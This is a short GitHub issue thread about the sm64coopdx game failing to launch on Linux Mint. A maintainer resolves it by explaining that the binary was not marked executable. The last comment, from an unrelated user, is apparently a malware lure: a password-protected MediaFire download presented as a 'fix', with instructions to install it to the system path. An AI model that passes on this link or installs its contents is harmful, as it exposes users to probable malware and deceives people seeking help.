### ISSUE TITLE
Unable to open game on Linux Mint; Unknown file type

### ISSUE THREAD

**Issue by Nyanrpg08** [coop-deluxe/sm64coopdx#287]
**Describe the bug**
Today i downloaded v1.0.1 of the game and played it for a bit until v1.0.2 came out, i replaced all of the files, but when i tried opening the executable, it said that the file type was unknown, giving me the option to cancel or choose a program to open it with.

**To Reproduce**
1. Replace the files on a pre-existing v1.0.1 installation with the v1.0.2 ones
2. Open 'sm64coopdx'
3. See error

**Expected behavior**
The game opening normally.

**Screenshots**
![image](https://github.com/user-attachments/assets/05a0479d-c23e-4816-8a30-6e9a4d9ffaae)
Translated, it says: Unknown file type; The file “sm64coopdx” has no known programs associated with it. Use the 'Open With' window to choose a program to open it with.

**Desktop (please complete the following information):**
 - OS: Linux Mint
 - Browser: Google Chrome
 - Version: 21.3 Cinnamon

**Additional context**
Attempting to opening it in the terminal returns with "Access denied", running it with sudo returns with "Command not found".

**Comment by AgentXLP** [comment]
Mark it as an executable, I couldn't compile the builds on Linux this time around so I had to use WSL and forgot to run `chmod` or whatever you need to run.

**Comment by Nyanrpg08** [comment]
Got it, i'll do that right now, i'll close the issue then.

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
